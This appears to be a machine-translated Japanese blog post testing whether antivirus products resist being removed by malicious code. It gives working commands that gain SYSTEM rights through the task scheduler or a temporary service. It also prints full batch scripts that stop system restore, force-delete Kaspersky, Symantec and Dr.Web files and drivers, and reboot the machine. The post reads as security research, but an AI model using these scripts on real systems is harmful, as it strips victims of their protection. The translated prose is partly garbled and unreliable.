最近、我々はすでに現代のアンチウイルスの発見的技術の力について議論しており、誰も信頼されるべきではないという結論に達しました。 時々私自身にも:)
今日は、ウイルス対策のもう一つの論争の的である自己防衛について話します。 一部のベンダーはこの瞬間を非常に真剣に受け止めており、自社製品はアクティブな感染の複雑で複雑なケースにも耐え、ウイルスインターセプトを効果的に除去し、システムに自身をインストールし、その後すでに登録済みのマルウェアを削除します 他の人は、積極的な感染は風車との戦いであり、価値のあるものにはならないと信じています-したがって、LiveCD、そして場合によってはフォーマットc:
私たちは両方の反対者に信用を与えます:もちろん、バイラルな対立を打ち負かす機会があれば、これは良いことです。 これだけでbsodが発生せず、数日間システムがロードされない場合。 そして、深刻で複雑な感染では、アクティブな大量のインターセプト、カーネルレベルでの悪意のあるプロセスなどを突破することが不可能なことが多いことは明らかです。したがって、多くの場合、非アクティブなシステム(LiveCDまたは感染していないマシンのハードドライブのスキャン)を処理する方が合理的です雑多なファイル感染-そしてOSの完全な再インストールについて考えてください。
しかし、私たちは紛争にふけることはありません-次の記事のためにそれを残しましょう:)簡単なことについて話しましょう:故意に感染していないシステム上でさえ、システムの自己防衛について。 先験的に:
1)包括的な製品ウイルス対策+ヒップ+ファイアウォールがあります。
2)システムは感染していませんが、何らかの形で悪意のあるコードが入力されました。
3)悪意のあるコードには、ウイルス対策ソフトウェアを削除するか、完全に機能しないようにするために十分な損害を与える意図があります。
このオプションは最も簡単です-ローカルシステム権限を持つ重要なアンチウイルスファイルを削除する試み。 このアプローチのアイデアは、私の友人のアレクセイ・バラノフに属します。 時間が経ったので、ベンダーが自ら立ち上がったと仮定します-これを確認してください。
Windowsシステムでは、管理者の下で作業し(これはおそらくすべてのシステムの80%です)、ローカルシステム権限の取得は非常に簡単です。 ネットでよく説明されている2つの方法がすぐに思い浮かびます。
方法1.スケジューラーを使用します。
デフォルトでは、タスクスケジューラサービスはすべてのWindowsシステムで実行されます。 このサービスは、必要なローカルシステム権限でタスクを実行します。 その後、なんらかの方法でタスクを追加するのは非常に簡単です。
at 11:05 c:\killer.bat
kill.batはローカルシステムとして起動します。
利点は明白です。すべてがシンプルで明確です。 短所:ユーザーはスケジューラーで奇妙な新しいタスクに気付き、単にセキュリティ上の理由でこのサービスを無効にします。
方法1.サービスを作成します。
このメソッドの本質は、サービスを作成し、それを開始して削除することです。 この場合、すべてが3行で実装されます。
sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:\killer.bat)"
net start CmdAsSystem
sc delete CmdAsSystem
さらに、 killer.batはIDLE優先度で開始されるだけでなく、ローカルシステムに代わって起動されます。
このメソッドは非表示であり、明示されません。
KIS 2010の記事の公開時点では、両方の方法は、権限を要求することなく、ヒップレベルでスキップされました。
それでは、 killer.bat自体に進みましょう(この場合、ドライブCのルートにありますが、どこにでも投げることができるのは明らかです)。
このファイルの本質は簡単です。ウイルス対策に属するものはすべて削除します。 したがって、Kaspersky 2010の場合は次のようになります。
net stop srservice
erase /F /S /Q "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010"
erase /F /S /Q "%windir%\system32\drivers\kl1.sys"
erase /F /S /Q "%windir%\system32\drivers\klif.sys"
erase /F /S /Q "%windir%\system32\drivers\klbg.sys"
erase /F /S /Q "%windir%\system32\drivers\klim5.sys"
erase /F /S /Q "%windir%\system32\drivers\klmd.sys"
erase /F /S /Q "%windir%\system32\drivers\klmouflt.sys"
shutdown -r -f -c "Bye-Bye!!!"
シマンテックの場合、次のようなものです(より正確に知っている-正しい、私はカスペルスキーにいます)。
net stop srservice
erase /F /S /Q "C:\Program Files\Symantec"
erase /F /S /Q "C:\Program Files\Norton Internet Security"
shutdown -r -f -c "Bye-Bye!!!"
Doctor Webの場合:
net stop srservice
erase /F /S /Q "C:\Program Files\DrWeb"
erase /F /S /Q "%windir%\system32\drivers\dwprot.sys"
erase /F /S /Q "%windir%\system32\drivers\drwebaf.sys"
erase /F /S /Q "%windir%\system32\drivers\DrWebPF.sys"
erase /F /S /Q "%windir%\system32\drivers\spiderg3.sys"
shutdown -r -f -c "Bye-Bye!!!"
まあなど。 最初の行は、Windows Recovery Serviceの停止です-念のため:)
同様のスクリプトをすべてのウイルス対策に規定できることは明らかです。本質は、重要なファイルへのパスを変更することです。
合計-何がありますか?
1. KIS 2010はこのような被害を受けたため、システムは保護されずに放置されました。 KIS 2011にはこの性的弱点がありませんが、まだベータ版です...
2. NISはいくつかのファイルを失いましたが、パフォーマンスは低下せず、インターネットからの更新時にファイルがダウンロードおよび復元されました。
3.予想通り、感染に対抗することを開発者が特に重視していることを考慮して、DrWebはまったく害を受けませんでした。 しかし、Web用のSpiDieがあることを忘れないでください...
同時に、これらの製品の腰は冷静に両方のバージョンの操作を逃しました(KISは個人的にチェックしました)。
結論
残念ながら、既存のアンチウイルスソリューションのいくつかには、保護を損傷し、実際にコンピュータからアンチウイルスを削除するために使用できる多くの脆弱性があるという事実を認めなければなりません。
コメントで、他のアンチウイルス製品に関する観察と研究を補完することが提案されています(ローカルシステムの権利を取得するためのブロッキングアクションのレベルを評価するために、ヒップを使用することが望ましい) 説明した操作は理解可能であり、愛好家の仮想マシンで簡単に再現できると思います。
乾杯!
